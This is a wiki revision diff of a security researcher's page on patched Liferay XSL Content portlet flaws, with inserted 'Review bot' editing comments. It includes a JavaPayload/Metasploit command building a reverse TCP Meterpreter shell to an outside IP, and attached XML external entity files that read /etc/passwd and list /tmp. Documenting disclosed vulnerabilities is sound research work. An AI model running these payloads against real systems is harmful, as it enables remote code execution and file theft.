Changes for page Application_Liferay
from the version of 2012/01/13 14:10 to the version of 2012/04/19 14:05
Summary
- Page properties (2 modified, 0 added, 0 removed)
- Attachments (0 modified, 3 added, 0 removed)
Details
- Page properties
- Tags
... ... @@ -1,0 +1,1 @@ 1 +liferay|java|xalan-j|code execution|XEE - Content
... ... 
@@ -1,25 +1,35 @@ 1 - Dixit[[Wikipedia>>http://en.wikipedia.org/wiki/Liferay||rel="__blank"]] : //"Liferay Portal is a free and open source enterprise portal written in Java and distributed under the GNU Lesser General Public License.[2] and proprietary licenses. It is primarily used to power corporate intranets and extranets. [...] Liferay Portal is Java based and runs on any computing platform capable of running the Java Runtime Environment and an application server. Liferay is available bundled with an servlet container such as Apache Tomcat."//1 +{{toc/}} 2 2 3 -= =Java code execution ==3 += Introduction = 4 4 5 - LIferayincludes numerous portlets. The "XSL Content" portlet displaystheresult of the XSL transformation of a XML document. The XSLT engine used by default is[[Xalan-J>>Engine_Saxon]] (but this canprobably modifiedeasily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]).AsXalan-Jallowsbydefaultto execute Javacodefromthestylesheet,that's an easy to exploitvulnerability.Anylogged-in usercanexecutearbitraryJavacodein thecontextof theWebApplication server(usuallyTomcat):[[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]].5 +Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/Liferay||rel="__blank"]] : //"Liferay Portal is a free and open source enterprise portal written in Java and distributed under the GNU Lesser General Public License.[2] and proprietary licenses. It is primarily used to power corporate intranets and extranets. [...] Liferay Portal is Java based and runs on any computing platform capable of running the Java Runtime Environment and an application server. Liferay is available bundled with an servlet container such as Apache Tomcat."// 6 6 7 +The vulnerabilities described here were patched in version 6.0.6 GA (cf. the [[Release Notes for 6.0.6 GA>>http://issues.liferay.com/secure/ReleaseNote.jspa?version=10656&styleName=Html&projectId=10952||rel="__blank"]]). 
7 7 9 += Java code execution = 8 8 9 - Executingcommandsandreadingtheoutput(usingthe"xalanj-reading-stdout.xsl"script included on the[[Xalan-J>>Engine_Saxon]]page) :11 +LIferay includes numerous portlets. The "XSL Content" portlet displays the result of the XSL transformation of a XML document. The XSLT engine used by default is [[Xalan-J>>Engine_XalanJ]] (but this can probably modified easily using [[JAXP>>http://en.wikipedia.org/wiki/Java_API_for_XML_Processing||rel="__blank"]]). As Xalan-J allows by default to execute Java code from the stylesheet, that's an easy to exploit vulnerability. Any logged-in user can execute arbitrary Java code in the context of the Web Application server (usually Tomcat) : [[CVE-2011-1571>>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1571||rel="__blank"]]. 10 10 13 +Executing commands and reading the output (using the "xalanj-reading-stdout.xsl" script included on the [[Xalan-J>>Engine_XalanJ]] page) : 14 + 11 11 [[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]] 12 12 13 -= =Additional vulnerabilities ==17 += Meterpreter shell = 14 14 15 - Twoothersvulnerabilitieswereidentifiedthe"XSLContent"portlet :19 +As described in [[Feature #6594: Liferay XSL Command Execution>>http://dev.metasploit.com/redmine/issues/6594||rel="__blank"]], here's a way to gain a Meterpreter shell with this vulnerability : 16 16 17 -* CVE-2011-1503 : allows to read XML files via a file:~/~/ URL 21 +- stand-alone JavaPayload to generate the XSLT stylesheet (java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 - - JSh) 22 +- Metasploit to handle the Meterpreter connection (PAYLOAD=java/meterpreter/reverse_tcp) 23 +- Manual interaction to trigger the vulnerability (browser) 18 18 19 - *CVE-2011-1502 : allows to readUTF-8 files andto listdirectories viaa XEE (XML ExternalEntity)attack25 += Additional vulnerabilities = 20 20 27 +Two others vulnerabilities 
were identified in the "XSL Content" portlet : 21 21 29 +* CVE-2011-1503 : allows to read XML files via a file:~/~/ URL (not mine !) 22 22 23 - Reading/etc/passwd usingCVE-2011-1502 :31 +* CVE-2011-1502 : allows to read UTF-8 files and to list directories via a XEE (XML External Entity) attack 24 24 33 +Reading /etc/passwd using CVE-2011-1502 (cf attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]) : 34 + 25 25 [[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]
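Review bot: the rewritten paragraphs keep the typos of the old version: "LIferay" should be "Liferay", "this can probably modified easily" is missing "be", and "Two others vulnerabilities" should read "Two other vulnerabilities"; since this edit already adds a toc and promotes the headings from `==` to `=`, a proofreading pass of the same lines would fit here. The added sentence "The vulnerabilities described here were patched in version 6.0.6 GA" is the only mitigation statement on the page and sits in the introduction, before any CVE is named; consider repeating the fixed version next to each entry of the "Additional vulnerabilities" list, and replacing "(not mine !)" on CVE-2011-1503 with an explicit credit so the attribution is understandable outside the author's context. The link correction from `Engine_Saxon` to `Engine_XalanJ` is right, since the text identifies the default engine as Xalan-J.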
- liferay-read-etc-passwd-via-xee.png
- Author
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,0 +1,1 @@ 1 +64.6 KB - Content
- liferay-xee.xml
- Author
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,0 +1,1 @@ 1 +184 bytes - Content
... ... @@ -1,0 +1,9 @@ 1 +<!DOCTYPE doc [ 2 +<!ENTITY boom1 SYSTEM "/etc/passwd"> 3 +<!ENTITY boom2 SYSTEM "/tmp/"> 4 +]> 5 +<doc> 6 +<response><file>&boom1;</file></response> 7 +<response><file>&boom2;</file></response> 8 +</doc> 9 +
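Review bot: nothing in the attachment says which case each entity covers: `boom1` (SYSTEM "/etc/passwd") is the UTF-8 file read and `boom2` (SYSTEM "/tmp/") is the directory listing that the page text attributes to CVE-2011-1502, so an XML comment before the DOCTYPE naming the two cases and the CVE would let the file be understood without the page. The file also carries the limitation the prose only hints at with "UTF-8 files": a target that is not valid UTF-8 makes entity expansion fail instead of returning content, and the second entity only produces a listing where the parser's file URL handling returns directory contents as text; that caveat belongs in the page text next to the attachment links rather than being left implicit.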
- liferay-xee.xsl
- Author
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,0 +1,1 @@ 1 +319 bytes - Content
... ... @@ -1,0 +1,12 @@ 1 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"> 2 +<xsl:template match="/doc"> 3 + <html><body> 4 + <xsl:for-each select="response"> 5 + <h2>File content :</h2> 6 + <xsl:value-of select="file"/> 7 + <hr/> 8 + </xsl:for-each> 9 + </body></html> 10 +</xsl:template> 11 +</xsl:stylesheet> 12 +
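Review bot: the stylesheet is inert on its own, it only emits `<xsl:value-of select="file"/>` for each `response` element, so the external-entity expansion is done by the XML parser on liferay-xee.xml before the transform runs; the page text links both attachments but never states this pairing, and a one-line comment at the top of the stylesheet saying that it merely renders whatever the parser substituted for `&boom1;` and `&boom2;` (which is what the liferay-read-etc-passwd-via-xee.png screenshot shows) would make the two files self-explanatory. Minor: the literal "File content :" keeps French spacing before the colon; "File content:" reads better in English output.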